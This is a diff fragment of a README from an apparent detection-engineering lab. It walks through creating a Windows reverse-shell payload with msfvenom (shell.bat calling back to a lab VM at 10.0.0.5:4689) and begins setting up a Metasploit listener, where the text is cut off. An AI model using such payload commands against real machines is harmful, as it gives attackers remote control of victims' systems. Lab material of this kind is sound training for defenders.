FelixAburto/Detection-Engineering/README.md

 <img src="https://i.imgur.com/fcGQLBq.png" height="100%" width="100%" alt="Detection Engineering Logo Team Ghost"/>
 </p>

-Next we are going to create a shell.bat file with code that will allow us to spawn a reverse shell.
-First, make sure that you are in the Desktop directory in your terminal then execute this command:
+Next, we will create a shell.bat file with code that will allow us to spawn a reverse shell.
+First, ensure that you are in the Desktop directory in your terminal, then execute the following command:

 ```Bash
 msfvenom -p cmd/windows/reverse_powershell lhost=10.0.0.5 lport=4689 > shell.bat
 ```

 This command creates a reverse shell payload for Windows that uses PowerShell to connect back to our Parrot OS VM at IP address 10.0.0.5 on port 4689.
-The payload is saved as a batch file (shell.bat), which, when executed on our Windows 11 VM machine, will establish a reverse shell connection, giving us remote control over the Windows 11 VM.
+The payload is saved as a batch file (shell.bat).
+When executed on our Windows 11 VM, this batch file will establish a reverse shell connection, giving us remote control over the Windows 11 VM.

 <p align="center">
 <img src="https://i.imgur.com/cSCiapf.png" height="100%" width="100%" alt="Detection Engineering Logo Team Ghost"/>
 </p>

-Afterwards we need to set up the multi-handler to listen for our payload to spawn the reverse shell.
-To do this enter in this series of commands:
+Afterward, we need to set up the multi-handler to listen for our payload and spawn the reverse shell.
+To do this, enter the following series of commands:

 ```Bash
 sudo msfconsole